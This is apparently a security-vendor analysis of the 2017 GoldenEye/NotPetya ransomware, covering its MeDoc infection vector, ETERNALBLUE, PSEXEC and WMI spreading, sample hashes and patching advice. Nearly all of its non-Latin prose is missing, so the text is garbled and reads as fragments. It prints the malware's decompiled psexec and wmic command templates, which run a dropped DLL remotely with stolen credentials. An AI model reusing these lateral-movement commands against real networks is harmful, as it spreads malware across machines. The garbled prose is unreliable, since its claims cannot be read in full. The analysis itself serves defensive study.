27 2017
, GoldenEye, .
, MBR ( Windows) , .
DLL, , , . . , , , , .
, . . , GoldenEye , , .
.
:
• MeDoc —
( )
• ETERNALBLUE: , ,
Microsoft 14 2017 MS17-010.
• PSEXEC: , PSEXEC.
• WMI: , WMI
1: 7e37ab34ecdcc3e77e24522ddfd4852d
. :
• EternalBlue
• PSEXEC
v8 = wsprintfW(a2, L"%s \\\\%s -accepteula -s ", v3, a3);
v9 = wsprintfW(&a2[v8], L"-d C:\\Windows\\System32\\rundll32.exe \"C:\\Windows\\%s\",#1 ", &v14) + v8;
• WMI
wbem\wmic.exe %s /node:"%ws" /user:"%ws" /password:"%ws" process call create "C:\Windows\System32\rundll32.exe \"C:\Windows\%s\" #1"
2: 71b6a493388e7d0b40c83ce903bc6b04
, — EZVIT, MeDoc,
. GoldenEye :
, -, .
• ,
. ,
, .
• , .
• ETERNALBLUE, , :
technet.microsoft.com/en-us/library/security/ms17-010.aspx
• ,
Adaptive Defense Adaptive Defense 360.
• Adaptive Defense, Adaptive Defense Lock: , Panda Security .
• ,
.